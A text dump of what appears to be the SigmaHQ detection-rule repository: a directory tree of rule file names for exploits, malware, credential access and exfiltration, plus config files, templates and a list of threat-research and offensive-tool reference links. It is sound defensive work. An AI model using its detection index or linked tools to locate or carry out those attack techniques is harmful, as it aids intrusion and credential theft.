│ │ └── dns_query_win_apt_dprk_malicious_domains.yml │ │ ├── FIN7/ │ │ │ └── proc_creation_win_apt_fin7_exploitation_indicators.yml │ │ ├── Forest-Blizzard/ │ │ │ ├── README.md │ │ │ ├── file_event_win_apt_forest_blizzard_activity.yml │ │ │ ├── file_event_win_apt_forest_blizzard_constrained_js.yml │ │ │ ├── proc_creation_win_apt_forest_blizzard_activity.yml │ │ │ ├── registry_set_apt_forest_blizzard_custom_protocol_handler.yml │ │ │ └── registry_set_apt_forest_blizzard_custom_protocol_handler_dll.yml │ │ └── SlashAndGrab-Exploitation-In-Wild/ │ │ └── 
file_event_win_apt_unknown_exploitation_indicators.yml │ ├── 2025/ │ │ ├── Exploits/ │ │ │ ├── CVE-2025-10035/ │ │ │ │ └── proc_creation_win_exploit_cve_2025_10035.yml │ │ │ ├── CVE-2025-20333/ │ │ │ │ └── proxy_exploit_cve_2025_20333.yml │ │ │ ├── CVE-2025-24054/ │ │ │ │ └── file_event_win_exploit_cve_2025_24054_library_ms.yml │ │ │ ├── CVE-2025-30406/ │ │ │ │ └── proc_creation_win_exploit_cve_2025_30406_centrestack_portal_child_process.yml │ │ │ ├── CVE-2025-31161/ │ │ │ │ └── proc_creation_win_crushftp_susp_child_processes.yml │ │ │ ├── CVE-2025-31324/ │ │ │ │ ├── file_event_lnx_sap_netweaver_webshell_creation.yml │ │ │ │ ├── file_event_win_sap_netweaver_webshell_creation.yml │ │ │ │ ├── proc_creation_lnx_sap_netweaver_susp_child_process.yml │ │ │ │ ├── proc_creation_win_sap_netweaver_susp_child_process.yml │ │ │ │ ├── web_lnx_exploit_cve_2025_31324_sap_netviewer_webshell.yml │ │ │ │ └── web_lnx_exploit_cve_2025_31324_sap_netviewer_webshell_uploaded.yml │ │ │ ├── CVE-2025-32463/ │ │ │ │ └── file_event_lnx_exploit_cve_2025_32463.yml │ │ │ ├── CVE-2025-33053/ │ │ │ │ ├── image_load_win_exploit_cve_2025_33053.yml │ │ │ │ ├── proc_access_win_exploit_cve_2025_33053.yml │ │ │ │ └── proc_creation_win_exploit_cve_2025_33053.yml │ │ │ ├── CVE-2025-40551/ │ │ │ │ └── proc_creation_win_exploit_cve_2025_40551.yml │ │ │ ├── CVE-2025-4427/ │ │ │ │ └── web_invanti_epmm_cve_2025_4427_and_cve_2025_4428.yml │ │ │ ├── CVE-2025-49144/ │ │ │ │ └── proc_creation_win_exploit_cve_2025_49144.yml │ │ │ ├── CVE-2025-53770/ │ │ │ │ ├── file_event_win_exploit_cve_2025_53770.yml │ │ │ │ ├── proc_creation_win_exploit_cve_2025_53770_indicators.yml │ │ │ │ └── web_win_iis_exploit_cve_2025_53770.yml │ │ │ ├── CVE-2025-54309/ │ │ │ │ └── proc_creation_win_exploit_cve_2025_54309.yml │ │ │ ├── CVE-2025-55182/ │ │ │ │ ├── proc_creation_lnx_exploit_cve_2025_55182_susp_nodejs_server_child_process.yml │ │ │ │ └── proc_creation_win_exploit_cve_2025_55182_susp_nodejs_server_child_process.yml │ │ │ ├── 
CVE-2025-57788/ │ │ │ │ └── proc_creation_win_exploit_cve_2025_57788.yml │ │ │ ├── CVE-2025-57790/ │ │ │ │ └── proc_creation_win_exploit_cve_2025_57790.yml │ │ │ ├── CVE-2025-57791/ │ │ │ │ └── proc_creation_win_exploit_cve_2025_57791.yml │ │ │ └── CVE-2025-59287/ │ │ │ ├── proc_creation_win_exploit_cve_2025_59287.yml │ │ │ └── win_wsus_exploit_cve_2025_59287.yml │ │ └── Malware/ │ │ ├── Atomic-MacOS-Stealer/ │ │ │ ├── file_event_macos_malware_amos_persistence.yml │ │ │ └── proc_creation_macos_malware_amos_curl_post.yml │ │ ├── Grixba/ │ │ │ └── proc_creation_win_malware_grixba_recon.yml │ │ ├── Katz-Stealer/ │ │ │ ├── dns_query_win_katz_stealer_domain.yml │ │ │ ├── image_load_win_katz_stealer_payloads.yml │ │ │ ├── net_dns_katz_stealer_domain.yml │ │ │ └── zeek_http_katz_stealer_susp_useragent.yml │ │ ├── Shai-Hulud/ │ │ │ ├── file_event_lnx_mal_shai_hulud_workflow.yml │ │ │ ├── github_mal_shai_hulud_npm_attack.yml │ │ │ └── proc_creation_lnx_mal_shai_hululd_exfiltration.yml │ │ ├── file_event_win_malware_funklocker_ransomware_extension.yml │ │ └── proc_creation_win_malware_kalambur_curl_socks_tor.yml │ └── README.md ├── rules-placeholder/ │ ├── README.md │ ├── cloud/ │ │ ├── aws/ │ │ │ └── cloudtrail/ │ │ │ └── aws_cloudtrail_console_login_success_from_susp_locations.yml │ │ └── azure/ │ │ ├── audit_logs/ │ │ │ └── azure_ad_account_created_deleted_nonapproved_user.yml │ │ └── signin_logs/ │ │ ├── azure_ad_account_signin_outside_hours.yml │ │ ├── azure_privileged_account_no_saw_paw.yml │ │ ├── azure_privileged_account_sigin_expected_controls.yml │ │ └── azure_privileged_account_signin_outside_hours.yml │ └── windows/ │ ├── builtin/ │ │ └── security/ │ │ ├── win_security_admin_logon.yml │ │ ├── win_security_exploit_cve_2020_1472.yml │ │ ├── win_security_potential_pass_the_hash.yml │ │ ├── win_security_remote_registry_management_via_reg.yml │ │ └── win_security_susp_interactive_logons.yml │ ├── dns_query/ │ │ └── dns_query_win_wscript_cscript_resolution.yml │ ├── 
network_connection/ │ │ └── net_connection_win_susp_rdp_from_domain_controller.yml │ └── process_creation/ │ └── proc_creation_win_userdomain_variable_enumeration.yml ├── rules-threat-hunting/ │ ├── README.md │ ├── cloud/ │ │ ├── m365/ │ │ │ └── audit/ │ │ │ ├── microsoft365_susp_email_forwarding_activity.yml │ │ │ └── microsoft365_susp_inbox_rule_creation_or_update_activity.yml │ │ └── okta/ │ │ └── okta_password_health_report_query.yml │ ├── linux/ │ │ ├── file/ │ │ │ └── file_event/ │ │ │ ├── file_event_lnx_python_path_configuration_files.yml │ │ │ └── file_event_lnx_susp_long_filename_pattern.yml │ │ └── process_creation/ │ │ ├── proc_creation_lnx_susp_process_termination_via_kill.yml │ │ └── proc_creation_lnx_susp_running_process_discovery.yml │ ├── macos/ │ │ ├── file/ │ │ │ └── file_event/ │ │ │ └── file_event_macos_python_path_configuration_files.yml │ │ └── process_creation/ │ │ └── proc_creation_macos_pbpaste_execution.yml │ ├── network/ │ │ └── net_dns_low_reputation_etld.yml │ ├── web/ │ │ └── proxy_generic/ │ │ └── proxy_susp_class_extension_request.yml │ └── windows/ │ ├── builtin/ │ │ ├── appxdeployment_server/ │ │ │ └── win_appxpackaging_server_successful_package_installation.yml │ │ ├── firewall_as/ │ │ │ └── win_firewall_as_change_rule.yml │ │ └── security/ │ │ ├── account_management/ │ │ │ └── win_security_scrcons_remote_wmi_scripteventconsumer.yml │ │ ├── win_security_file_access_browser_credential.yml │ │ └── win_security_scheduled_task_deletion.yml │ ├── create_remote_thread/ │ │ ├── create_remote_thread_win_loadlibrary.yml │ │ ├── create_remote_thread_win_powershell_generic.yml │ │ └── create_remote_thread_win_susp_target_shell_application.yml │ ├── file/ │ │ ├── file_access/ │ │ │ ├── file_access_win_browsers_chromium_sensitive_files.yml │ │ │ ├── file_access_win_browsers_credential.yml │ │ │ ├── file_access_win_office_outlook_mail_credential.yml │ │ │ ├── file_access_win_susp_gpo_access_uncommon_process.yml │ │ │ ├── 
file_access_win_susp_reg_and_hive.yml │ │ │ └── file_access_win_susp_unattend_xml.yml │ │ ├── file_change/ │ │ │ └── file_change_win_date_changed_to_another_year.yml │ │ ├── file_delete/ │ │ │ └── file_delete_win_zone_identifier_ads.yml │ │ ├── file_event/ │ │ │ ├── file_event_win_dump_file_creation.yml │ │ │ ├── file_event_win_pfx_file_creation.yml │ │ │ ├── file_event_win_python_path_configuration_files.yml │ │ │ ├── file_event_win_scheduled_task_creation.yml │ │ │ ├── file_event_win_susp_binary_dropper.yml │ │ │ ├── file_event_win_vscode_tunnel_indicators.yml │ │ │ ├── file_event_win_wdac_policy_creation_in_codeintegrity_folder.yml │ │ │ └── file_event_win_webdav_tmpfile_creation.yml │ │ └── file_rename/ │ │ └── file_rename_win_non_dll_to_dll_ext.yml │ ├── image_load/ │ │ ├── image_load_dll_amsi_uncommon_process.yml │ │ ├── image_load_dll_bitsproxy_load_by_uncommon_process.yml │ │ ├── image_load_dll_dbghelp_dbgcore_susp_load.yml │ │ ├── image_load_dll_system_drawing_load.yml │ │ ├── image_load_dll_taskschd_by_process_in_potentially_suspicious_location.yml │ │ ├── image_load_office_excel_xll_load.yml │ │ ├── image_load_office_word_wll_load.yml │ │ ├── image_load_win_werfaultsecure_dbgcore_dbghelp_load.yml │ │ └── image_load_wmi_module_load_by_uncommon_process.yml │ ├── network_connection/ │ │ ├── net_connection_win_dfsvc_non_local_ip.yml │ │ ├── net_connection_win_dfsvc_uncommon_ports.yml │ │ ├── net_connection_win_dllhost_non_local_ip.yml │ │ ├── net_connection_win_hh_http_connection.yml │ │ ├── net_connection_win_msiexec_http.yml │ │ ├── net_connection_win_powershell_network_connection.yml │ │ ├── net_connection_win_susp_azurefd_connection.yml │ │ └── net_connection_win_susp_initaited_public_folder.yml │ ├── pipe_created/ │ │ └── pipe_created_sysinternals_psexec_default_pipe.yml │ ├── powershell/ │ │ ├── powershell_classic/ │ │ │ ├── posh_pc_alternate_powershell_hosts.yml │ │ │ └── posh_pc_bxor_operator_usage.yml │ │ ├── powershell_module/ │ │ │ └── 
posh_pm_susp_netfirewallrule_recon.yml │ │ └── powershell_script/ │ │ ├── posh_ps_compress_archive_usage.yml │ │ ├── posh_ps_email_forwarding_activity.yml │ │ ├── posh_ps_inbox_rule_creation_or_update_activity.yml │ │ ├── posh_ps_mailbox_access.yml │ │ ├── posh_ps_new_netfirewallrule_allow.yml │ │ ├── posh_ps_new_smbmapping_quic.yml │ │ ├── posh_ps_registry_reconnaissance.yml │ │ ├── posh_ps_remove_item_path.yml │ │ ├── posh_ps_send_mailmessage.yml │ │ ├── posh_ps_token_obfuscation.yml │ │ ├── posh_ps_win_api_functions_access.yml │ │ └── posh_ps_win_api_library_access.yml │ ├── process_access/ │ │ ├── proc_access_win_lsass_powershell_access.yml │ │ ├── proc_access_win_lsass_susp_source_process.yml │ │ ├── proc_access_win_lsass_uncommon_access_flag.yml │ │ └── proc_access_win_susp_potential_shellcode_injection.yml │ ├── process_creation/ │ │ ├── proc_creation_win_7zip_password_extraction.yml │ │ ├── proc_creation_win_attrib_system.yml │ │ ├── proc_creation_win_boinc_execution.yml │ │ ├── proc_creation_win_cmd_redirect.yml │ │ ├── proc_creation_win_cmd_set_prompt_abuse.yml │ │ ├── proc_creation_win_conhost_headless_execution.yml │ │ ├── proc_creation_win_csc_compilation.yml │ │ ├── proc_creation_win_curl_download.yml │ │ ├── proc_creation_win_curl_execution.yml │ │ ├── proc_creation_win_curl_fileupload.yml │ │ ├── proc_creation_win_curl_useragent.yml │ │ ├── proc_creation_win_dfsvc_child_processes.yml │ │ ├── proc_creation_win_diskshadow_child_process.yml │ │ ├── proc_creation_win_diskshadow_script_mode.yml │ │ ├── proc_creation_win_explorer_child_of_shell_process.yml │ │ ├── proc_creation_win_extexport_execution.yml │ │ ├── proc_creation_win_findstr_password_recon.yml │ │ ├── proc_creation_win_iexpress_execution.yml │ │ ├── proc_creation_win_microsoft_workflow_compiler_execution.yml │ │ ├── proc_creation_win_mode_codepage_change.yml │ │ ├── proc_creation_win_net_execution.yml │ │ ├── proc_creation_win_net_quic.yml │ │ ├── proc_creation_win_office_svchost_parent.yml 
│ │ ├── proc_creation_win_powershell_abnormal_commandline_size.yml │ │ ├── proc_creation_win_powershell_crypto_namespace.yml │ │ ├── proc_creation_win_powershell_import_module.yml │ │ ├── proc_creation_win_powershell_new_netfirewallrule_allow.yml │ │ ├── proc_creation_win_powershell_susp_child_processes.yml │ │ ├── proc_creation_win_regsvr32_dllregisterserver_exec.yml │ │ ├── proc_creation_win_remote_access_tools_action1_code_exec_and_remote_sessions.yml │ │ ├── proc_creation_win_remote_access_tools_ammyy_admin_execution.yml │ │ ├── proc_creation_win_remote_access_tools_anyviewer_shell_exec.yml │ │ ├── proc_creation_win_remote_access_tools_screenconnect_child_proc.yml │ │ ├── proc_creation_win_rundll32_by_ordinal.yml │ │ ├── proc_creation_win_rundll32_dllregisterserver.yml │ │ ├── proc_creation_win_sc_query.yml │ │ ├── proc_creation_win_schtasks_creation_from_susp_parent.yml │ │ ├── proc_creation_win_susp_cli_obfuscation_unicode.yml │ │ ├── proc_creation_win_susp_compression_params.yml │ │ ├── proc_creation_win_susp_elevated_system_shell.yml │ │ ├── proc_creation_win_susp_event_log_query.yml │ │ ├── proc_creation_win_susp_execution_from_guid_folder_names.yml │ │ ├── proc_creation_win_susp_execution_path_webserver.yml │ │ ├── proc_creation_win_susp_exfil_and_tunneling_tool_execution.yml │ │ ├── proc_creation_win_susp_file_permission_modifications.yml │ │ ├── proc_creation_win_susp_ntfs_short_name_path_use_cli.yml │ │ ├── proc_creation_win_susp_open_html_file_from_download_folder.yml │ │ ├── proc_creation_win_susp_parent_execute_itself.yml │ │ ├── proc_creation_win_susp_script_exec_from_compressed_parent.yml │ │ ├── proc_creation_win_taskkill_execution.yml │ │ ├── proc_creation_win_tasklist_basic_execution.yml │ │ ├── proc_creation_win_webdav_process_execution.yml │ │ ├── proc_creation_win_winscp_command_open_ftp.yml │ │ ├── proc_creation_win_winscp_portable_execution.yml │ │ ├── proc_creation_win_wmic_recon_system_info.yml │ │ ├── 
proc_creation_win_wscript_cscript_script_exec.yml │ │ ├── proc_creation_win_wsl_arbitrary_command_execution.yml │ │ └── proc_creation_win_wusa_cab_files_extraction.yml │ └── registry/ │ ├── registry_event/ │ │ └── registry_event_scheduled_task_creation.yml │ └── registry_set/ │ ├── registry_set_office_trusted_location.yml │ ├── registry_set_powershell_crypto_namespace.yml │ ├── registry_set_runmru_command_execution.yml │ ├── registry_set_service_image_path_user_controlled_folder.yml │ └── registry_set_shell_context_menu_tampering.yml ├── tests/ │ ├── check-baseline-local.sh │ ├── deprecated_rules.py │ ├── logsource.json │ ├── promote_rules_status.py │ ├── reference-archiver.py │ ├── regression_tests_runner.py │ ├── rule-references.txt │ ├── sigma-package-release.py │ ├── sigma_cli_conf.yml │ ├── test_logsource.py │ ├── test_rules.py │ ├── thor.yml │ └── validate-sigma-schema/ │ ├── sigma-schema.json │ └── validate.py └── unsupported/ ├── README.md ├── cloud/ │ ├── aws_ec2_download_userdata.yml │ ├── aws_enum_backup.yml │ ├── aws_enum_listing.yml │ ├── aws_enum_network.yml │ ├── aws_enum_storage.yml │ ├── aws_lambda_function_created_or_invoked.yml │ ├── aws_macic_evasion.yml │ ├── aws_ses_messaging_enabled.yml │ └── azure_aad_secops_signin_failure_bad_password_threshold.yml ├── linux/ │ ├── lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml │ ├── lnx_auditd_cve_2021_3156_sudo_buffer_overflow_brutforce.yml │ ├── lnx_auditd_cve_2021_4034.yml │ ├── lnx_auditd_debugfs_usage.yml │ ├── lnx_auditd_omigod_scx_runasprovider_executescript.yml │ ├── lnx_auth_susp_failed_logons_single_source.yml │ └── lnx_shell_priv_esc_prep.yml ├── network/ │ ├── net_dns_c2_detection.yml │ ├── net_dns_high_bytes_out.yml │ ├── net_dns_high_null_records_requests_rate.yml │ ├── net_dns_high_requests_rate.yml │ ├── net_dns_high_subdomain_rate.yml │ ├── net_dns_high_txt_records_requests_rate.yml │ ├── net_dns_large_domain_name.yml │ ├── net_firewall_high_dns_bytes_out.yml │ ├── 
net_firewall_high_dns_requests_rate.yml │ ├── net_firewall_susp_network_scan_by_ip.yml │ ├── net_firewall_susp_network_scan_by_port.yml │ └── net_possible_dns_rebinding.yml ├── other/ │ └── modsec_mulitple_blocks.yml ├── web/ │ └── web_multiple_susp_resp_codes_single_source.yml ├── windows/ │ ├── dns_query_win_possible_dns_rebinding.yml │ ├── driver_load_invoke_obfuscation_clip+_services.yml │ ├── driver_load_invoke_obfuscation_obfuscated_iex_services.yml │ ├── driver_load_invoke_obfuscation_stdin+_services.yml │ ├── driver_load_invoke_obfuscation_var+_services.yml │ ├── driver_load_invoke_obfuscation_via_compress_services.yml │ ├── driver_load_invoke_obfuscation_via_rundll_services.yml │ ├── driver_load_invoke_obfuscation_via_stdin_services.yml │ ├── driver_load_invoke_obfuscation_via_use_clip_services.yml │ ├── driver_load_invoke_obfuscation_via_use_mshta_services.yml │ ├── driver_load_invoke_obfuscation_via_use_rundll32_services.yml │ ├── driver_load_invoke_obfuscation_via_var++_services.yml │ ├── driver_load_meterpreter_or_cobaltstrike_getsystem_service_installation.yml │ ├── driver_load_tap_driver_installation.yml │ ├── file_event_executable_and_script_creation_by_office_using_file_ext.yml │ ├── image_load_mimikatz_inmemory_detection.yml │ ├── posh_ps_cl_invocation_lolscript_count.yml │ ├── posh_ps_cl_mutexverifiers_lolscript_count.yml │ ├── proc_creation_win_correlation_apt_silence_downloader_v3.yml │ ├── proc_creation_win_correlation_apt_turla_commands_medium.yml │ ├── proc_creation_win_correlation_dnscat2_powershell_implementation.yml │ ├── proc_creation_win_correlation_multiple_susp_cli.yml │ ├── proc_creation_win_correlation_susp_builtin_commands_recon.yml │ ├── sysmon_always_install_elevated_msi_spawned_cmd_and_powershell_spawned_processes.yml │ ├── sysmon_always_install_elevated_parent_child_correlated.yml │ ├── sysmon_non_priv_program_files_move.yml │ ├── sysmon_process_reimaging.yml │ ├── win_access_fake_files_with_stored_credentials.yml │ ├── 
win_apt_apt29_tor.yml │ ├── win_dumping_ntdsdit_via_dcsync.yml │ ├── win_dumping_ntdsdit_via_netsync.yml │ ├── win_kernel_and_3rd_party_drivers_exploits_token_stealing.yml │ ├── win_mal_service_installs.yml │ ├── win_metasploit_or_impacket_smb_psexec_service_install.yml │ ├── win_possible_privilege_escalation_using_rotten_potato.yml │ ├── win_remote_schtask.yml │ ├── win_remote_service.yml │ ├── win_security_global_catalog_enumeration.yml │ ├── win_security_rare_schtasks_creations.yml │ ├── win_security_susp_failed_logons_explicit_credentials.yml │ ├── win_security_susp_failed_logons_single_process.yml │ ├── win_security_susp_failed_logons_single_source.yml │ ├── win_security_susp_failed_logons_single_source2.yml │ ├── win_security_susp_failed_logons_single_source_kerberos.yml │ ├── win_security_susp_failed_logons_single_source_kerberos2.yml │ ├── win_security_susp_failed_logons_single_source_kerberos3.yml │ ├── win_security_susp_failed_logons_single_source_ntlm.yml │ ├── win_security_susp_failed_logons_single_source_ntlm2.yml │ ├── win_security_susp_failed_remote_logons_single_source.yml │ ├── win_security_susp_multiple_files_renamed_or_deleted.yml │ ├── win_security_susp_samr_pwset.yml │ ├── win_susp_failed_hidden_share_mount.yml │ ├── win_suspicious_werfault_connection_outbound.yml │ ├── win_system_rare_service_installs.yml │ └── win_taskscheduler_rare_schtask_creation.yml └── zeek/ ├── zeek_dce_rpc_domain_user_enumeration.yml └── zeek_http_exfiltration_compressed_files.yml ================================================ FILE CONTENTS ================================================ ================================================ FILE: .gitattributes ================================================ # Set the default behavior, in case people don't have core.autocrlf set. * text=lf # Explicitly declare text files you want to always be normalized and converted # to native line endings on checkout. 
*.c text *.h text *.csv text *.sh text *.py text # Declare files that will always have CRLF line endings on checkout. *.sln text eol=crlf # Denote all files that are truly binary and should not be modified. *.png binary *.jpg binary # Force LF line endings for Sigma rule files. NOTE(review): the default `* text=lf` above is not a recognized value for the `text` attribute (valid forms are set, unset, or `auto`) and is effectively treated as unspecified; the documented way to express "normalize everything, check out as LF" is `* text=auto eol=lf` -- confirm the intent before changing it. *.yml text eol=lf ================================================ FILE: .github/FUNDING.yml ================================================ # These are supported funding model platforms github: [thomaspatzke] patreon: # Replace with a single Patreon username open_collective: # Replace with a single Open Collective username ko_fi: # Replace with a single Ko-fi username tidelift: # Replace with a single Tidelift platform-name/package-name e.g., npm/babel community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry liberapay: # Replace with a single Liberapay username issuehunt: # Replace with a single IssueHunt username otechie: # Replace with a single Otechie username lfx_crowdfunding: # Replace with a single LFX Crowdfunding project-name e.g., cloud-foundry custom: # Replace with up to 4 custom sponsorship URLs e.g., ['link1', 'link2'] ================================================ FILE: .github/ISSUE_TEMPLATE/false_positive_report.yml ================================================ name: "False Positive Report" description: Report false positives with SIGMA rules labels: [False-Positive] assignees: - nasbench body: - type: input attributes: label: Rule UUID placeholder: "f3be1b1d-eb3c-4ab1-b5e5-81e330fa2cd0" description: | You can copy the rule id from the `id` field in the rule. 
validations: required: true - type: textarea attributes: label: Example EventLog description: An event log example of the false positive in question placeholder: | SubjectLogonId 0x1d3f2a NewProcessId 0x5f14 NewProcessName C:\Windows\System32\dllhost.exe TokenElevationType %%1937 ProcessId 0x1270 CommandLine dllhost TargetUserSid S-1-0-0 TargetUserName - TargetDomainName - TargetLogonId 0x0 ParentProcessName C:\Windows\System32\cmd.exe validations: required: true - type: textarea attributes: label: Description placeholder: This is just a placeholder description description: | Provide any additional information that you might think is helpful validations: required: true ================================================ FILE: .github/ISSUE_TEMPLATE/rule_proposal.md ================================================ --- name: "Rule Proposal" about: Rule Idea Proposal title: '' labels: Rule assignees: - nasbench --- ### Description of the Idea of the Rule ### Public References / Example Event Log ================================================ FILE: .github/PULL_REQUEST_TEMPLATE.md ================================================ ### Summary of the Pull Request ### Changelog ### Example Log Event ### Fixed Issues ### SigmaHQ Rule Creation Conventions - If your PR adds new rules, please consider following and applying these [conventions](https://github.com/SigmaHQ/sigma-specification/blob/main/sigmahq/) ================================================ FILE: .github/labeler.yml ================================================ Rules: - changed-files: - any-glob-to-any-file: - 'deprecated/**' - 'rules/**' - 'rules-compliance/**' - 'rules-dfir/**' - 'rules-emerging-threats/**' - 'rules-placeholder/**' - 'rules-threat-hunting/**' Emerging-Threats: - changed-files: - any-glob-to-any-file: 'rules-emerging-threats/**' Threat-Hunting: - changed-files: - any-glob-to-any-file: 'rules-threat-hunting/**' MacOS: - changed-files: - any-glob-to-any-file: - 'rules/macos/**' - 
'rules-compliance/macos/**' - 'rules-dfir/macos/**' - 'rules-emerging-threats/macos/**' - 'rules-placeholder/macos/**' - 'rules-threat-hunting/macos/**' Windows: - changed-files: - any-glob-to-any-file: - 'rules/windows/**' - 'rules-compliance/windows/**' - 'rules-dfir/windows/**' - 'rules-emerging-threats/windows/**' - 'rules-placeholder/windows/**' - 'rules-threat-hunting/windows/**' Linux: - changed-files: - any-glob-to-any-file: - 'rules/linux/**' - 'rules-compliance/linux/**' - 'rules-dfir/linux/**' - 'rules-emerging-threats/linux/**' - 'rules-placeholder/linux/**' - 'rules-threat-hunting/linux/**' Maintenance: - changed-files: - any-glob-to-any-file: - 'documentation/**' - 'tests/**' - '.github/**' - 'README.md' - 'Releases.md' Review Needed: - changed-files: - any-glob-to-any-file: '**' ================================================ FILE: .github/latest_archiver_output.md ================================================ # Reference Archiver Results Last Execution: 2026-03-01 02:19:10 ### Archiver Script Results #### Newly Archived References N/A #### Already Archived References - https://gtfobins.github.io/gtfobins/curl/ - https://kostas-ts.medium.com/detecting-abuse-of-openedrs-permissive-edr-trial-a-security-researcher-s-perspective-fc55bf53972c - https://app.any.run/tasks/1efb3ed4-cc0f-4690-a0ed-24516809bc72/ - https://thehackernews.com/2025/03/unpatched-windows-zero-day-flaw.html - https://medium.com/@boutnaru/the-windows-foreniscs-journey-run-mru-run-dialog-box-most-recently-used-57375a02d724 - https://github.com/clearvector/lambda-spy - https://fourcore.io/blogs/threat-hunting-browser-credential-stealing - https://docs.python.org/2/library/simplehttpserver.html - https://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-monitor-federation-changes - https://thedfirreport.com/2025/06/30/hide-your-rdp-password-spray-leads-to-ransomhub-deployment/ - 
https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc#rds-modifydbinstance - https://www.chrisfarris.com/post/effective-aws-ransomware/ - https://github.com/dsnezhkov/TruffleSnout/blob/7c2f22e246ef704bc96c396f66fa854e9ca742b9/TruffleSnout/Docs/USAGE.md - https://nvd.nist.gov/vuln/detail/CVE-2025-2825 - https://cloud.google.com/blog/topics/threat-intelligence/russia-targeting-signal-messenger/ - https://learn.microsoft.com/en-us/windows/compatibility/ntvdm-and-16-bit-app-support - https://docs.fortinet.com/document/fortigate/7.6.4/cli-reference/328136827/config-user-group - https://github.com/swagkarna/Defeat-Defender-V1.2.0/tree/ae4059c4276da6f6303b8f53cdff085ecae88a91 - https://medium.com/r3d-buck3t/red-teaming-in-cloud-leverage-azure-frontdoor-cdn-for-c2-redirectors-79dd9ca98178 #### Error While Archiving References - http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/ - https://www.linkedin.com/posts/mauricefielenbach_sharepoint-incidentresponse-windowssecurity-activity-7352653907363303425-bL2f - https://unicornofhunt.com/2025/05/22/When-Unicorns-Go-Quiet-BITS-Jobs-and-the-Art-of-Stealthy-Transfers/ - https://www.huntress.com/blog/malicious-browser-extention-crashfix-kongtuke - https://www.trendmicro.com/en_gb/research/22/e/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10) - https://goodworkaround.com/2022/02/15/digging-into-azure-ad-certificate-based-authentication/ - https://www.cve.org/CVERecord?id=CVE-2024-1709 - https://research.checkpoint.com/2025/cve-2025-24054-ntlm-exploit-in-the-wild/ - https://www.trendmicro.com/en_us/research/24/j/edrsilencer-disrupting-endpoint-security-solutions.html - https://unit42.paloaltonetworks.com/cve-2025-59287/ - https://www.zerosalarium.com/2025/09/Dumping-LSASS-With-WER-On-Modern-Windows-11.html - 
https://docs.aws.amazon.com/kms/latest/developerguide/ct-importkeymaterial.html - https://www.elastic.co/docs/reference/security/prebuilt-rules/rules/integrations/aws/defense_evasion_ec2_flow_log_deletion - https://docs.connectwise.com/ConnectWise_Control_Documentation/Get_started/Host_client/View_menu/Backstage_mode - https://www.trendmicro.com/en_us/research/25/c/windows-shortcut-zero-day-exploit.html - https://learn.microsoft.com/en-us/sql/t-sql/statements/drop-database-transact-sql?view=sql-server-ver16 - https://x.com/Wietze/status/1933495426952421843 - https://paper.seebug.org/1495/ - https://web.archive.org/web/20231015205935/https://githubmemory.com/repo/FunctFan/JNDIExploit - https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules - https://www.welivesecurity.com/2020/03/05/guildma-devil-drives-electric/ - https://www.cisa.gov/stopransomware/ransomware-guide - https://web.archive.org/web/20211001064856/https://github.com/snovvcrash/DInjector - https://www.elastic.co/guide/en/security/current/potential-non-standard-port-ssh-connection.html - https://www.huntress.com/blog/know-thy-enemy-a-novel-november-case-on-persistent-remote-access - https://github.com/TwoSevenOneT/EDR-Freeze/blob/a7f61030b36fbde89871f393488f7075d2aa89f6/EDR-Freeze.cpp#L53 - https://localtonet.com/documents/supported-tunnels - https://learn.microsoft.com/en-us/dotnet/api/system.diagnostics.eventing.reader.eventlogsession.clearlog?view=windowsdesktop-9.0&viewFallbackFrom=dotnet-plat-ext-5.0#System_Diagnostics_Eventing_Reader_EventLogSession_ClearLog_System_String_ - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/Start-Process?view=powershell-5.1&viewFallbackFrom=powershell-7 - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/deployment/deploy-appcontrol-policies-with-memcm - 
https://beierle.win/2024-12-20-Weaponizing-WDAC-Killing-the-Dreams-of-EDR/ - https://www.microsoft.com/en-us/security/blog/2025/03/06/malvertising-campaign-leads-to-info-stealers-hosted-on-github/ - https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#service-principal-assigned-to-a-role - https://tria.ge/241015-l98snsyeje/behavioral2 - https://www.hexacorn.com/blog/2023/06/07/this-lolbin-doesnt-exist/ - https://securelist.com/sidewinder-apt/114089/ - https://github.com/bobby-tablez/TTP-Threat-Feeds/blob/45398914e631f8372c3a9fbcd339ff65ffff1b17/results/2025/10/20251001-161956-trendmicro-atomic-macos-stealer-(amos).yml#L36 - https://github.com/redcanaryco/atomic-red-team/blob/5f866ca4517e837c4ea576e7309d0891e78080a8/atomics/T1040/T1040.md#atomic-test-16---powershell-network-sniffing - https://www.rapid7.com/blog/post/tr-crimson-collective-a-new-threat-group-observed-operating-in-the-cloud/ - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11) - https://www.joesandbox.com/analysis/1605063/0/html - https://syedhasan010.medium.com/forensics-analysis-of-an-lnk-file-da68a98b8415 - https://thedfirreport.com/2025/02/24/confluence-exploit-leads-to-lockbit-ransomware/ - https://learn.microsoft.com/en-us/dotnet/framework/tools/regasm-exe-assembly-registration-tool - https://www.hexacorn.com/blog/2020/02/02/settingsynchost-exe-as-a-lolbin - https://intel.thedfirreport.com/eventReports/view/57 - https://informationsecuritybuzz.com/the-real-danger-behind-a-simple-windows-shortcut/ - https://github.com/CoreyCBurton/DripLoaderNG - https://blog.malwarebytes.com/malwarebytes-news/2021/02/lazyscripter-from-empire-to-double-rat/ - https://www.hexacorn.com/blog/2023/12/31/1-little-known-secret-of-forfiles-exe/ - https://www.microsoft.com/en-us/security/blog/2025/10/06/investigating-active-exploitation-of-cve-2025-10035-goanywhere-managed-file-transfer-vulnerability/ - 
